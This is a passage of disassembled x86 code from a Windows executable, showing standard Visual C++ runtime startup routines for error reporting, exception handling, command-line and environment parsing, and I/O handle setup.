cmp eax, 12h
jb short loc_419E68
loc_419E77: ; CODE XREF: sub_419E4A+25�j
mov esi, eax
shl esi, 3
cmp ecx, dword_42CF50[esi]
jnz loc_419FAB
mov eax, dword_479EA8
cmp eax, 1
jz loc_419F86
cmp eax, edx
jnz short loc_419EA7
cmp dword_42C744, 1
jz loc_419F86
loc_419EA7: ; CODE XREF: sub_419E4A+4E�j
cmp ecx, 0FCh
jz loc_419FAB
push 104h
lea eax, [ebp+var_10C]
push eax
push edx
mov [ebp+var_8], dl
call ds:dword_41F010 ; GetModuleFileNameA
test eax, eax
jnz short loc_419EE0
lea eax, [ebp+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_41B390
pop ecx
pop ecx
loc_419EE0: ; CODE XREF: sub_419E4A+81�j
lea eax, [ebp+var_10C]
push eax
lea edi, [ebp+var_10C]
call sub_416000
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_419F22
lea eax, [ebp+var_10C]
push eax
call sub_416000
mov edi, eax
lea eax, [ebp+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_412C40
add esp, 10h
loc_419F22: ; CODE XREF: sub_419E4A+AD�j
push edi
call sub_416000
push off_42CF54[esi]
mov ebx, eax
call sub_416000
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_412DD0
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_41B390
push edi
push ebx
call sub_41B3A0
push offset asc_4283A8 ; "\n\n"
push ebx
call sub_41B3A0
push off_42CF54[esi]
push ebx
call sub_41B3A0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_41D75B
add esp, 2Ch
jmp short loc_419FAB
; ---------------------------------------------------------------------------
loc_419F86: ; CODE XREF: sub_419E4A+46�j
; sub_419E4A+57�j
push edx
lea eax, [ebp+arg_0]
push eax
lea esi, off_42CF54[esi]
push dword ptr [esi]
call sub_416000
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_41F190 ; GetStdHandle
push eax
call ds:dword_41F038 ; WriteFile
loc_419FAB: ; CODE XREF: sub_419E4A+38�j
; sub_419E4A+63�j ...
lea esp, [ebp-118h]
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_4182D6
pop edi
pop esi
pop ebx
leave
retn
sub_419E4A endp
; =============== S U B R O U T I N E =======================================
sub_419FC1 proc near ; CODE XREF: sub_4148E1+9�p
; sub_414906+9�p
mov eax, dword_479EA8
cmp eax, 1
jz short loc_419FD8
test eax, eax
jnz short locret_419FF9
cmp dword_42C744, 1
jnz short locret_419FF9
loc_419FD8: ; CODE XREF: sub_419FC1+8�j
push 0FCh
call sub_419E4A
mov eax, dword_47A028
test eax, eax
pop ecx
jz short loc_419FEE
call eax
loc_419FEE: ; CODE XREF: sub_419FC1+29�j
push 0FFh
call sub_419E4A
pop ecx
locret_419FF9: ; CODE XREF: sub_419FC1+C�j
; sub_419FC1+15�j
retn
sub_419FC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419FFA proc near ; CODE XREF: .text:00414ACE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_415456
mov edi, [ebp+arg_0]
mov esi, eax
mov edx, [esi+54h]
mov eax, dword_42D064
mov ecx, edx
loc_41A015: ; CODE XREF: sub_419FFA+2A�j
cmp [ecx], edi
jz short loc_41A026
lea ebx, [eax+eax*2]
add ecx, 0Ch
lea ebx, [edx+ebx*4]
cmp ecx, ebx
jb short loc_41A015
loc_41A026: ; CODE XREF: sub_419FFA+1D�j
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
cmp ecx, eax
jnb short loc_41A034
cmp [ecx], edi
jz short loc_41A036
loc_41A034: ; CODE XREF: sub_419FFA+34�j
xor ecx, ecx
loc_41A036: ; CODE XREF: sub_419FFA+38�j
test ecx, ecx
jz loc_41A150
mov ebx, [ecx+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_41A150
cmp ebx, 5
jnz short loc_41A05D
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_41A159
; ---------------------------------------------------------------------------
loc_41A05D: ; CODE XREF: sub_419FFA+55�j
cmp ebx, 1
jz loc_41A14B
mov eax, [esi+58h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [esi+58h], eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_41A13D
mov edx, dword_42D058
mov eax, dword_42D05C
add eax, edx
cmp edx, eax
jge short loc_41A0B6
lea eax, [edx+edx*2]
shl eax, 2
loc_41A095: ; CODE XREF: sub_419FFA+B7�j
mov edi, [esi+54h]
and dword ptr [eax+edi+8], 0
mov edi, dword_42D058
mov ebx, dword_42D05C
inc edx
add ebx, edi
add eax, 0Ch
cmp edx, ebx
jl short loc_41A095
mov ebx, [ebp+arg_0]
loc_41A0B6: ; CODE XREF: sub_419FFA+93�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov edi, [esi+5Ch]
jnz short loc_41A0CC
mov dword ptr [esi+5Ch], 83h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A0CC: ; CODE XREF: sub_419FFA+C7�j
cmp ecx, 0C0000090h
jnz short loc_41A0DD
mov dword ptr [esi+5Ch], 81h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A0DD: ; CODE XREF: sub_419FFA+D8�j
cmp ecx, 0C0000091h
jnz short loc_41A0EE
mov dword ptr [esi+5Ch], 84h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A0EE: ; CODE XREF: sub_419FFA+E9�j
cmp ecx, 0C0000093h
jnz short loc_41A0FF
mov dword ptr [esi+5Ch], 85h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A0FF: ; CODE XREF: sub_419FFA+FA�j
cmp ecx, 0C000008Dh
jnz short loc_41A110
mov dword ptr [esi+5Ch], 82h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A110: ; CODE XREF: sub_419FFA+10B�j
cmp ecx, 0C000008Fh
jnz short loc_41A121
mov dword ptr [esi+5Ch], 86h
jmp short loc_41A130
; ---------------------------------------------------------------------------
loc_41A121: ; CODE XREF: sub_419FFA+11C�j
cmp ecx, 0C0000092h
jnz short loc_41A130
mov dword ptr [esi+5Ch], 8Ah
loc_41A130: ; CODE XREF: sub_419FFA+D0�j
; sub_419FFA+E1�j ...
push dword ptr [esi+5Ch]
push 8
call ebx
pop ecx
mov [esi+5Ch], edi
jmp short loc_41A144
; ---------------------------------------------------------------------------
loc_41A13D: ; CODE XREF: sub_419FFA+7E�j
and dword ptr [ecx+8], 0
push eax
call ebx
loc_41A144: ; CODE XREF: sub_419FFA+141�j
mov eax, [ebp+var_4]
pop ecx
mov [esi+58h], eax
loc_41A14B: ; CODE XREF: sub_419FFA+66�j
or eax, 0FFFFFFFFh
jmp short loc_41A159
; ---------------------------------------------------------------------------
loc_41A150: ; CODE XREF: sub_419FFA+3E�j
; sub_419FFA+4C�j
push [ebp+arg_4]
call ds:dword_41F194 ; UnhandledExceptionFilter
loc_41A159: ; CODE XREF: sub_419FFA+5E�j
; sub_419FFA+154�j
pop edi
pop esi
pop ebx
leave
retn
sub_419FFA endp
; =============== S U B R O U T I N E =======================================
sub_41A15E proc near ; CODE XREF: .text:00414A86�p
cmp dword_47B674, 0
jnz short loc_41A16C
call sub_4195AD
loc_41A16C: ; CODE XREF: sub_41A15E+7�j
push esi
mov esi, dword_47B664
test esi, esi
jnz short loc_41A17E
mov esi, 41FA76h
jmp short loc_41A1C3
; ---------------------------------------------------------------------------
loc_41A17E: ; CODE XREF: sub_41A15E+17�j
mov al, [esi]
cmp al, 22h
jnz short loc_41A1AC
inc esi
mov al, [esi]
cmp al, 22h
jz short loc_41A1BC
loc_41A18B: ; CODE XREF: sub_41A15E+45�j
test al, al
jz short loc_41A1A5
movzx eax, al
push eax
call sub_41D885
test eax, eax
pop ecx
jz short loc_41A19E
inc esi
loc_41A19E: ; CODE XREF: sub_41A15E+3D�j
inc esi
mov al, [esi]
cmp al, 22h
jnz short loc_41A18B
loc_41A1A5: ; CODE XREF: sub_41A15E+2F�j
cmp byte ptr [esi], 22h
jnz short loc_41A1BD
jmp short loc_41A1BC
; ---------------------------------------------------------------------------
loc_41A1AC: ; CODE XREF: sub_41A15E+24�j
cmp al, 20h
jbe short loc_41A1BD
loc_41A1B0: ; CODE XREF: sub_41A15E+56�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41A1B0
jmp short loc_41A1BD
; ---------------------------------------------------------------------------
loc_41A1B8: ; CODE XREF: sub_41A15E+63�j
cmp al, 20h
ja short loc_41A1C3
loc_41A1BC: ; CODE XREF: sub_41A15E+2B�j
; sub_41A15E+4C�j
inc esi
loc_41A1BD: ; CODE XREF: sub_41A15E+4A�j
; sub_41A15E+50�j ...
mov al, [esi]
test al, al
jnz short loc_41A1B8
loc_41A1C3: ; CODE XREF: sub_41A15E+1E�j
; sub_41A15E+5C�j
mov eax, esi
pop esi
retn
sub_41A15E endp
; =============== S U B R O U T I N E =======================================
sub_41A1C7 proc near ; CODE XREF: .text:loc_414A55�p
push ebx
xor ebx, ebx
cmp dword_47B674, ebx
push esi
push edi
jnz short loc_41A1D9
call sub_4195AD
loc_41A1D9: ; CODE XREF: sub_41A1C7+B�j
mov esi, dword_479EA0
xor edi, edi
cmp esi, ebx
jnz short loc_41A1F7
jmp short loc_41A217
; ---------------------------------------------------------------------------
loc_41A1E7: ; CODE XREF: sub_41A1C7+34�j
cmp al, 3Dh
jz short loc_41A1EC
inc edi
loc_41A1EC: ; CODE XREF: sub_41A1C7+22�j
push esi
call sub_416000
pop ecx
lea esi, [esi+eax+1]
loc_41A1F7: ; CODE XREF: sub_41A1C7+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_41A1E7
lea eax, ds:4[edi*4]
push eax
call sub_41344D
mov edi, eax
cmp edi, ebx
pop ecx
mov dword_479E7C, edi
jnz short loc_41A21C
loc_41A217: ; CODE XREF: sub_41A1C7+1E�j
or eax, 0FFFFFFFFh
jmp short loc_41A274
; ---------------------------------------------------------------------------
loc_41A21C: ; CODE XREF: sub_41A1C7+4E�j
mov esi, dword_479EA0
push ebp
jmp short loc_41A24F
; ---------------------------------------------------------------------------
loc_41A225: ; CODE XREF: sub_41A1C7+8A�j
push esi
call sub_416000
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_41A24D
push ebp
call sub_41344D
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_41A278
push esi
push eax
call sub_41B390
pop ecx
pop ecx
add edi, 4
loc_41A24D: ; CODE XREF: sub_41A1C7+6B�j
add esi, ebp
loc_41A24F: ; CODE XREF: sub_41A1C7+5C�j
cmp [esi], bl
jnz short loc_41A225
push dword_479EA0
call sub_412FE4
mov dword_479EA0, ebx
mov [edi], ebx
mov dword_47B668, 1
xor eax, eax
loc_41A272: ; CODE XREF: sub_41A1C7+C5�j
pop ecx
pop ebp
loc_41A274: ; CODE XREF: sub_41A1C7+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41A278: ; CODE XREF: sub_41A1C7+78�j
push dword_479E7C
call sub_412FE4
mov dword_479E7C, ebx
or eax, 0FFFFFFFFh
jmp short loc_41A272
sub_41A1C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A28E proc near ; CODE XREF: sub_41A3FA+54�p
; sub_41A3FA+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_41A2B1
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41A2B1: ; CODE XREF: sub_41A28E+18�j
; sub_41A28E+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_41A2C4
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_41A2F1
; ---------------------------------------------------------------------------
loc_41A2C4: ; CODE XREF: sub_41A28E+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_41A2CF
mov cl, [eax]
mov [edi], cl
inc edi
loc_41A2CF: ; CODE XREF: sub_41A28E+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test byte_47A401[ebx], 4
jz short loc_41A2EA
inc dword ptr [esi]
test edi, edi
jz short loc_41A2E9
mov bl, [eax]
mov [edi], bl
inc edi
loc_41A2E9: ; CODE XREF: sub_41A28E+54�j
inc eax
loc_41A2EA: ; CODE XREF: sub_41A28E+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_41A323
loc_41A2F1: ; CODE XREF: sub_41A28E+34�j
test edx, edx
jnz short loc_41A2B1
cmp cl, 20h
jz short loc_41A2FF
cmp cl, 9
jnz short loc_41A2B1
loc_41A2FF: ; CODE XREF: sub_41A28E+6A�j
test edi, edi
jz short loc_41A307
and byte ptr [edi-1], 0
loc_41A307: ; CODE XREF: sub_41A28E+73�j
; sub_41A28E+96�j
and [ebp+var_4], 0
loc_41A30B: ; CODE XREF: sub_41A28E+157�j
cmp byte ptr [eax], 0
jz loc_41A3EA
loc_41A314: ; CODE XREF: sub_41A28E+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_41A320
cmp cl, 9
jnz short loc_41A326
loc_41A320: ; CODE XREF: sub_41A28E+8B�j
inc eax
jmp short loc_41A314
; ---------------------------------------------------------------------------
loc_41A323: ; CODE XREF: sub_41A28E+61�j
dec eax
jmp short loc_41A307
; ---------------------------------------------------------------------------
loc_41A326: ; CODE XREF: sub_41A28E+90�j
cmp byte ptr [eax], 0
jz loc_41A3EA
cmp [ebp+arg_0], 0
jz short loc_41A33E
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41A33E: ; CODE XREF: sub_41A28E+A5�j
inc dword ptr [ebx]
loc_41A340: ; CODE XREF: sub_41A28E+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_41A349
; ---------------------------------------------------------------------------
loc_41A347: ; CODE XREF: sub_41A28E+BE�j
inc eax
inc edx
loc_41A349: ; CODE XREF: sub_41A28E+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_41A347
cmp byte ptr [eax], 22h
jnz short loc_41A379
test dl, 1
jnz short loc_41A377
cmp [ebp+var_4], 0
jz short loc_41A36A
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_41A36A
mov eax, ecx
jmp short loc_41A36C
; ---------------------------------------------------------------------------
loc_41A36A: ; CODE XREF: sub_41A28E+CE�j
; sub_41A28E+D6�j
xor ebx, ebx
loc_41A36C: ; CODE XREF: sub_41A28E+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_41A377: ; CODE XREF: sub_41A28E+C8�j
shr edx, 1
loc_41A379: ; CODE XREF: sub_41A28E+C3�j
test edx, edx
jz short loc_41A38A
loc_41A37D: ; CODE XREF: sub_41A28E+FA�j
test edi, edi
jz short loc_41A385
mov byte ptr [edi], 5Ch
inc edi
loc_41A385: ; CODE XREF: sub_41A28E+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_41A37D
loc_41A38A: ; CODE XREF: sub_41A28E+ED�j
mov cl, [eax]
test cl, cl
jz short loc_41A3D8
cmp [ebp+var_4], 0
jnz short loc_41A3A0
cmp cl, 20h
jz short loc_41A3D8
cmp cl, 9
jz short loc_41A3D8
loc_41A3A0: ; CODE XREF: sub_41A28E+106�j
test ebx, ebx
jz short loc_41A3D2
test edi, edi
jz short loc_41A3C1
movzx edx, cl
test byte_47A401[edx], 4
jz short loc_41A3BA
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_41A3BA: ; CODE XREF: sub_41A28E+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_41A3D0
; ---------------------------------------------------------------------------
loc_41A3C1: ; CODE XREF: sub_41A28E+118�j
movzx ecx, cl
test byte_47A401[ecx], 4
jz short loc_41A3D0
inc eax
inc dword ptr [esi]
loc_41A3D0: ; CODE XREF: sub_41A28E+131�j
; sub_41A28E+13D�j
inc dword ptr [esi]
loc_41A3D2: ; CODE XREF: sub_41A28E+114�j
inc eax
jmp loc_41A340
; ---------------------------------------------------------------------------
loc_41A3D8: ; CODE XREF: sub_41A28E+100�j
; sub_41A28E+10B�j ...
test edi, edi
jz short loc_41A3E0
and byte ptr [edi], 0
inc edi
loc_41A3E0: ; CODE XREF: sub_41A28E+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_41A30B
; ---------------------------------------------------------------------------
loc_41A3EA: ; CODE XREF: sub_41A28E+80�j
; sub_41A28E+9B�j
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41A3F4
and dword ptr [eax], 0
loc_41A3F4: ; CODE XREF: sub_41A28E+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_41A28E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A3FA proc near ; CODE XREF: .text:00414A44�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp dword_47B674, edi
jnz short loc_41A411
call sub_4195AD
loc_41A411: ; CODE XREF: sub_41A3FA+10�j
and byte_47A134, 0
push 104h
mov esi, offset dword_47A030
push esi
push edi
call ds:dword_41F010 ; GetModuleFileNameA
mov eax, dword_47B664
cmp eax, edi
mov dword_479E8C, esi
jz short loc_41A440
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_41A442
loc_41A440: ; CODE XREF: sub_41A3FA+3D�j
mov ebx, esi
loc_41A442: ; CODE XREF: sub_41A3FA+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_41A28E
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_41344D
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_41A472
or eax, 0FFFFFFFFh
jmp short loc_41A497
; ---------------------------------------------------------------------------
loc_41A472: ; CODE XREF: sub_41A3FA+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_41A28E
mov eax, [ebp+var_4]
dec eax
pop ecx
mov dword_479E70, eax
pop ecx
mov dword_479E74, edi
xor eax, eax
loc_41A497: ; CODE XREF: sub_41A3FA+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A3FA endp
; =============== S U B R O U T I N E =======================================
sub_41A49C proc near ; CODE XREF: .text:00414A3A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_47A138
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_41F1A4
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_41A4E5
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41A4CC
mov dword_47A138, 1
jmp short loc_41A4EA
; ---------------------------------------------------------------------------
loc_41A4CC: ; CODE XREF: sub_41A49C+22�j
call ds:dword_41F008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41A4E0
mov eax, ebp
mov dword_47A138, eax
jmp short loc_41A4E5
; ---------------------------------------------------------------------------
loc_41A4E0: ; CODE XREF: sub_41A49C+39�j
mov eax, dword_47A138
loc_41A4E5: ; CODE XREF: sub_41A49C+1A�j
; sub_41A49C+42�j
cmp eax, 1
jnz short loc_41A567
loc_41A4EA: ; CODE XREF: sub_41A49C+2E�j
cmp esi, ebx
jnz short loc_41A4F6
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41A56F
loc_41A4F6: ; CODE XREF: sub_41A49C+50�j
cmp [esi], bx
mov eax, esi
jz short loc_41A50B
loc_41A4FD: ; CODE XREF: sub_41A49C+66�j
; sub_41A49C+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_41A4FD
add eax, ebp
cmp [eax], bx
jnz short loc_41A4FD
loc_41A50B: ; CODE XREF: sub_41A49C+5F�j
mov edi, ds:dword_41F0AC
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41A55C
push ebp
call sub_41344D
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41A55C
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41A558
push [esp+18h+var_8]
call sub_412FE4
pop ecx
mov [esp+18h+var_8], ebx
loc_41A558: ; CODE XREF: sub_41A49C+AC�j
mov ebx, [esp+18h+var_8]
loc_41A55C: ; CODE XREF: sub_41A49C+8C�j
; sub_41A49C+9B�j
push esi
call ds:dword_41F1A0 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41A5B7
; ---------------------------------------------------------------------------
loc_41A567: ; CODE XREF: sub_41A49C+4C�j
cmp eax, ebp
jz short loc_41A573
cmp eax, ebx
jz short loc_41A573
loc_41A56F: ; CODE XREF: sub_41A49C+58�j
; sub_41A49C+E1�j
xor eax, eax
jmp short loc_41A5B7
; ---------------------------------------------------------------------------
loc_41A573: ; CODE XREF: sub_41A49C+CD�j
; sub_41A49C+D1�j
call ds:dword_41F19C ; GetEnvironmentStringsA
mov esi, eax
cmp esi, ebx
jz short loc_41A56F
cmp [esi], bl
jz short loc_41A58D
loc_41A583: ; CODE XREF: sub_41A49C+EA�j
; sub_41A49C+EF�j
inc eax
cmp [eax], bl
jnz short loc_41A583
inc eax
cmp [eax], bl
jnz short loc_41A583
loc_41A58D: ; CODE XREF: sub_41A49C+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_41344D
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_41A5A3
xor edi, edi
jmp short loc_41A5AE
; ---------------------------------------------------------------------------
loc_41A5A3: ; CODE XREF: sub_41A49C+101�j
push ebp
push esi
push edi
call sub_4177B0
add esp, 0Ch
loc_41A5AE: ; CODE XREF: sub_41A49C+105�j
push esi
call ds:dword_41F198 ; FreeEnvironmentStringsA
mov eax, edi
loc_41A5B7: ; CODE XREF: sub_41A49C+C9�j
; sub_41A49C+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41A49C endp
; =============== S U B R O U T I N E =======================================
sub_41A5BE proc near ; CODE XREF: .text:00414A1E�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 48h
push ebx
mov ebx, 480h
push ebx
call sub_41344D
test eax, eax
pop ecx
jnz short loc_41A5DA
or eax, 0FFFFFFFFh
jmp loc_41A7B7
; ---------------------------------------------------------------------------
loc_41A5DA: ; CODE XREF: sub_41A5BE+12�j
mov dword_47A2E0, eax
mov dword_47A2C8, 20h
lea ecx, [eax+480h]
jmp short loc_41A60F
; ---------------------------------------------------------------------------
loc_41A5F1: ; CODE XREF: sub_41A5BE+53�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, dword_47A2E0
add eax, 24h
add ecx, 480h
loc_41A60F: ; CODE XREF: sub_41A5BE+31�j
cmp eax, ecx
jb short loc_41A5F1
push ebp
push esi
push edi
lea eax, [esp+58h+var_44]
push eax
call ds:dword_41F148 ; GetStartupInfoA
cmp word ptr [esp+58h+var_14+2], 0
jz loc_41A716
mov eax, [esp+58h+var_10]
test eax, eax
jz loc_41A716
mov edi, [eax]
lea ebp, [eax+4]
lea eax, [edi+ebp]
mov [esp+58h+var_48], eax
mov eax, 800h
cmp edi, eax
jl short loc_41A650
mov edi, eax
loc_41A650: ; CODE XREF: sub_41A5BE+8E�j
cmp dword_47A2C8, edi
jge short loc_41A6A6
mov esi, offset dword_47A2E4
loc_41A65D: ; CODE XREF: sub_41A5BE+DE�j
push ebx
call sub_41344D
test eax, eax
pop ecx
jz short loc_41A6A0
add dword_47A2C8, 20h
mov [esi], eax
lea ecx, [eax+480h]
jmp short loc_41A68F
; ---------------------------------------------------------------------------
loc_41A679: ; CODE XREF: sub_41A5BE+D3�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, ebx
loc_41A68F: ; CODE XREF: sub_41A5BE+B9�j
cmp eax, ecx
jb short loc_41A679
add esi, 4
cmp dword_47A2C8, edi
jl short loc_41A65D
jmp short loc_41A6A6
; ---------------------------------------------------------------------------
loc_41A6A0: ; CODE XREF: sub_41A5BE+A8�j
mov edi, dword_47A2C8
loc_41A6A6: ; CODE XREF: sub_41A5BE+98�j
; sub_41A5BE+E0�j
xor ebx, ebx
test edi, edi
jle short loc_41A716
loc_41A6AC: ; CODE XREF: sub_41A5BE+156�j
mov eax, [esp+58h+var_48]
mov eax, [eax]
cmp eax, 0FFFFFFFFh
jz short loc_41A70B
mov cl, [ebp+0]
test cl, 1
jz short loc_41A70B
test cl, 8
jnz short loc_41A6CF
push eax
call ds:dword_41F1AC ; GetFileType
test eax, eax
jz short loc_41A70B
loc_41A6CF: ; CODE XREF: sub_41A5BE+104�j
mov ecx, ebx
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
lea esi, [ecx+eax*4]
mov eax, [esp+58h+var_48]
mov eax, [eax]
mov [esi], eax
mov al, [ebp+0]
mov [esi+4], al
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jz short loc_41A736
inc dword ptr [esi+8]
loc_41A70B: ; CODE XREF: sub_41A5BE+F7�j
; sub_41A5BE+FF�j ...
add [esp+58h+var_48], 4
inc ebx
inc ebp
cmp ebx, edi
jl short loc_41A6AC
loc_41A716: ; CODE XREF: sub_41A5BE+69�j
; sub_41A5BE+75�j ...
xor ebx, ebx
loc_41A718: ; CODE XREF: sub_41A5BE+1E2�j
mov ecx, dword_47A2E0
lea eax, [ebx+ebx*8]
lea esi, [ecx+eax*4]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_41A798
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41A73B
push 0FFFFFFF6h
pop eax
jmp short loc_41A745
; ---------------------------------------------------------------------------
loc_41A736: ; CODE XREF: sub_41A5BE+148�j
; sub_41A5BE+1CD�j
or eax, 0FFFFFFFFh
jmp short loc_41A7B4
; ---------------------------------------------------------------------------
loc_41A73B: ; CODE XREF: sub_41A5BE+171�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41A745: ; CODE XREF: sub_41A5BE+176�j
push eax
call ds:dword_41F190 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41A792
push edi
call ds:dword_41F1AC ; GetFileType
test eax, eax
jz short loc_41A792
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_41A770
or byte ptr [esi+4], 40h
jmp short loc_41A779
; ---------------------------------------------------------------------------
loc_41A770: ; CODE XREF: sub_41A5BE+1AA�j
cmp eax, 3
jnz short loc_41A779
or byte ptr [esi+4], 8
loc_41A779: ; CODE XREF: sub_41A5BE+1B0�j
; sub_41A5BE+1B5�j
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jz short loc_41A736
inc dword ptr [esi+8]
jmp short loc_41A79C
; ---------------------------------------------------------------------------
loc_41A792: ; CODE XREF: sub_41A5BE+193�j
; sub_41A5BE+19E�j
or byte ptr [esi+4], 40h
jmp short loc_41A79C
; ---------------------------------------------------------------------------
loc_41A798: ; CODE XREF: sub_41A5BE+169�j
or byte ptr [esi+4], 80h
loc_41A79C: ; CODE XREF: sub_41A5BE+1D2�j
; sub_41A5BE+1D8�j
inc ebx
cmp ebx, 3
jl loc_41A718
push dword_47A2C8
call ds:dword_41F1A8 ; SetHandleCount
xor eax, eax
loc_41A7B4: ; CODE XREF: sub_41A5BE+17B�j
pop edi
pop esi
pop ebp
loc_41A7B7: ; CODE XREF: sub_41A5BE+17�j
pop ebx
add esp, 48h
retn
sub_41A5BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A7BC proc near ; CODE XREF: sub_41A961+52�p
; sub_41D96E+91�p
var_420 = byte ptr -420h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov eax, dword_42CE38
xor eax, [ebp+4]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+var_14], edi
mov [ebp+var_18], edi
jnz short loc_41A7E5
